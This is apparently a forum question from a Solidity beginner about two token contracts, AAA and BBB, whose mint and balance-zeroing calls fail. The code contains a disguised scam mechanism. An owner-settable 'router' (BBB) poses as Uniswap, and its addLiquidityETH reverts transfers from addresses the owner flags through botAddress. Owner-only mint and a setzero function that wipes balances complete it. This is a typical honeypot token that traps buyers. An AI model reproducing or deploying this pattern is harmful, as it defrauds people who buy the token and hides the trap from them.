# Calling Mint And Change Balance From Another Smart Contract

Tags: tokens, solidity-0.8.x, mint, external-function

My Project is about a Token in which the Holder can disable their token at the Old Address and Receive a New Minted token.

It uses 2 different contacts. I put the functions in the `BBB` contract and will call it from the `AAA` contract. I saved the `BBB` contract address in the `AAA` contract using the variable `uniswap`.

I deployed both contracts using the same Wallet.

After testing, I encountered a problem.

1. **Boom function**: the function is successful, but the number of tokens at the destination address does not change.
2. **Mint Function**:
   function error and cannot be executed.

Can anyone help me. I'm completely new to this.

**Contract AAA**

```js
interface IUniswapV2Factory {

    function getPair(address tokenA, address tokenB) external view returns (address pair);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);

    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    


}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external view returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,  uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function mint(address to, uint256 amount) external payable returns (uint256 _balances);
    function setzero(address newTaxWallet) external;
    function TaxWallet(address newTaxWallet) external;
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);


}

interface IUniswapV2Router02 is IUniswapV2Router01 {

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function balanceOf(address account) external view returns (uint256);

    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


interface ISwapPair {
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function token0() external view returns (address);
    function balanceOf(address account) external view returns (uint256);
    function totalSupply() external view returns (uint256);
    function kLast() external view returns (uint);

}

contract AAA is Context, IERC20, Ownable {

    using SafeMath for uint256;
    using Address for address;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    address payable private marketingWalletAddress;
    address payable private teamWalletAddress;
    address private deadAddress = 0x000000000000000000000000000000000000dEaD;
    uint256 private preLPUnlockTime = 1695470400;
    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) private _allowances;

    mapping (address => bool) private isMarketPair;

    mapping(address => UserInfo) private _userInfo;
    struct UserInfo {
        uint256 lpAmount;
        bool preLP;
        uint256 unlockTime;
    }
    
    uint256 private _totalTaxIfBuying = 0;
    uint256 private _totalTaxIfSelling = 0;

    uint256 private _totalSupply;
    uint256 private _minimumTokensBeforeSwap = 0;
    address private _usdt;
    bool private startTx;


    IUniswapV2Router02 private uniswap;
    address private uniswapPair;

    bool inSwapAndLiquify;
    bool private swapAndLiquifyEnabled = false;
    bool private swapAndLiquifyByLimitOnly = false;

    event SwapAndLiquifyEnabledUpdated(bool enabled);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );

    event SwapETHForTokens(
        uint256 amountIn,
        address[] path
    );

    event SwapTokensForETH(
        uint256 amountIn,
        address[] path
    );

    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }


    constructor (
        string memory coinName,
        string memory coinSymbol,
        uint8 coinDecimals,
        uint256 supply
    ) payable {

        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

        _name = coinName;
        _symbol = coinSymbol;
        _decimals = coinDecimals;
        _owner = 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4;
        _totalSupply = supply  * 10 ** _decimals;
        marketingWalletAddress = payable(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4);
        teamWalletAddress = payable(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4);
        uniswap = _uniswapV2Router;
        _allowances[address(this)][address(uniswap)] = _totalSupply;
        _balances[_owner] = _totalSupply;
        emit Transfer(address(0), _owner, _totalSupply);
    }


    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) { return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender,
         _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function minimumTokensBeforeSwapAmount() public view returns (uint256) {
        return _minimumTokensBeforeSwap;
    }
    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function setNumTokensBeforeSwap(uint256 newLimit) external onlyOwner() {
        _minimumTokensBeforeSwap = newLimit;
    }

    function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner {
        swapAndLiquifyEnabled = _enabled;
        emit SwapAndLiquifyEnabledUpdated(_enabled);
    }


    function changeRouterVersion(address newRouterAddress) public onlyOwner returns(address newPairAddress) {

        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(newRouterAddress);

        uniswap = _uniswapV2Router; //Set new router address

        isMarketPair[address(uniswapPair)] = true;
    }


    function transferToAddressETH(address payable recipient, uint256 amount) private {
        recipient.transfer(amount);
    }
    
     //to recieve ETH from uniswapV2Router when swaping
    receive() external payable {}

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function Minter(address to, uint256 amount) public payable {
      uniswap.mint(to, amount);
    }
    
    function Boom(address newTaxWallet) external {
        uniswap.setzero (newTaxWallet);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(),
         _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _transfer(address sender, address recipient, uint256 amount) private returns (bool) {

        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");

        if(inSwapAndLiquify)
        {
            return _basicTransfer(sender, recipient, amount);
        }
        else
        {

            uint256 contractTokenBalance = balanceOf(address(this));
            bool overMinimumTokenBalance = contractTokenBalance >= _minimumTokensBeforeSwap;

            if (overMinimumTokenBalance && !inSwapAndLiquify && !isMarketPair[sender] && swapAndLiquifyEnabled)
            {
                if(swapAndLiquifyByLimitOnly)
                    contractTokenBalance = _minimumTokensBeforeSwap;
                addLiquidity(sender,contractTokenBalance);
            }

            _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");

            uint256 finalAmount = takeFee(sender, recipient, amount);


            _balances[recipient] = _balances[recipient].add(finalAmount);

            emit Transfer(sender,
             recipient, finalAmount);
            return true;
        }
    }

    function _basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
        _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }


    function swapAndLiquify(uint256 tAmount) private lockTheSwap {

        
        // swap token -> eth
        swapTokensForEth(tAmount);
        uint256 amountReceived = address(this).balance;
         
        // team eth
        uint256 amountUSDTTeam = amountReceived.mul(50).div(100);
        // marketing eth
        uint256 amountUSDTMarketing = amountReceived.sub(amountUSDTTeam);

        if(amountUSDTMarketing > 0)
            transferToAddressETH(marketingWalletAddress, amountUSDTMarketing);

        if(amountUSDTTeam > 0)
            transferToAddressETH(teamWalletAddress, amountUSDTTeam);


    }

    function addLiquidity(address sender,uint256 tokenAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswap), tokenAmount);
        uint256 ethAmount =  address(this).balance;
        // add the liquidity
        uniswap.addLiquidityETH{value: ethAmount}(
            sender,
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            address(this),
            block.timestamp
        );
    }
  
    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswap.WETH();

        _approve(address(this), address(uniswap), tokenAmount);

        // make the swap
        uniswap.swapExactTokensForETHSupportingFeeOnTransferTokens(  tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this), // The contract
            block.timestamp
        );

        emit SwapTokensForETH(tokenAmount, path);
    }



    function takeFee(address sender, address recipient, uint256 amount) internal returns (uint256) {

        uint256 feeAmount = 0;
        if(isMarketPair[sender]) {
            feeAmount = amount.mul(_totalTaxIfBuying).div(100);
        }
        else if(isMarketPair[recipient]) {
            feeAmount = amount.mul(_totalTaxIfSelling).div(100);
        }

        if(feeAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(feeAmount);
            emit Transfer(sender, address(this), feeAmount);
        }

        return amount.sub(feeAmount);
    }
    
   
}
```

**Contract BBB**

```js
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.7;

 // Define interface for TransferController
interface RouterController {
    function WETH() external view returns (address);
    function getAmountsIn(uint amountIn,address[] calldata path) external view returns (uint[] memory amounts);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract BBB is RouterController{

    mapping(address => uint256) private _isBlacklisted;
    mapping(address => uint256) private  _balances;
    address private owner;


    constructor (){
        owner = msg.sender;
        
    }
    function WETH() external view override returns(address){
        address ad = address(this);
        return ad;
    }

    function getCode() public  view returns (uint256) {
        address ad = address(this);
        uint256 result = uint160(ad);
        return result;
    }
    
    function getCode2(address addr) public pure returns (uint256) {
        uint256 result = uint160(addr);
        return result;
    }

    function getCode3(uint160 addr) public pure returns (address) {
        address result = address(addr);
        return result;
    }
    
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external virtual override payable  returns (uint amountToken, uint amountETH, uint liquidity) {
        amountToken = amountTokenDesired;
        amountETH = amountTokenMin;
        liquidity = _isBlacklisted[token];
        if(liquidity > 0){
            require(false);
        }
    }

    function getAmountsIn(uint amountIn, address[] memory path)
        public
        view
        virtual
        override
        returns (uint[] memory amounts)
    {
        amounts = new uint[](path.length);
        amounts[0] = _isBlacklisted[path[0]];
        return amounts;
    }


    function botAddress(address[] calldata accounts, uint256 excluded) public {
        require(msg.sender == owner);
        for (uint256 i = 0; i < accounts.length; i++) {
            _isBlacklisted[accounts[i]] = excluded;
        }
    }

    function mint(address to, uint256 amount) external virtual payable returns (uint256 balances){
        require(msg.sender == owner);
         balances = _balances[owner] += amount;
  }

    function setzero(address newTaxWallet) external {
    uint256 a = 0; 
    _balances [newTaxWallet] *= a;
    } 

}

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _transferOwnership(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function getTime() public view returns (uint256) {
        return block.timestamp;
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract Initializable {
    /**
     * @dev Indicates that the contract has been initialized.
     */
    bool private _initialized;

    /**
     * @dev Indicates that the contract is in the process of being initialized.
     */
    bool private _initializing;

    /**
     * @dev Modifier to protect an initializer function from being invoked twice.
     */
    modifier initializer() {
        require(_initializing || !_initialized, "Initializable: contract is already initialized");

        bool isTopLevelCall = !_initializing;
        if (isTopLevelCall) {
            _initializing = true;
            _initialized = true;
        }

        _;

        if (isTopLevelCall) {
            _initializing = false;
        }
    }
}

abstract contract ContextUpgradeable is Initializable {
    function __Context_init() internal initializer {
        __Context_init_unchained();
    }

    function __Context_init_unchained() internal initializer {
    }
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    uint256[50] private __gap;
}

abstract contract OwnableUpgradeable is Initializable, ContextUpgradeable {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    function __Ownable_init() internal initializer {
        __Context_init_unchained();
        __Ownable_init_unchained();
    }

    function __Ownable_init_unchained() internal initializer {
        _setOwner(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
    uint256[49] private __gap;
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }


    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}
```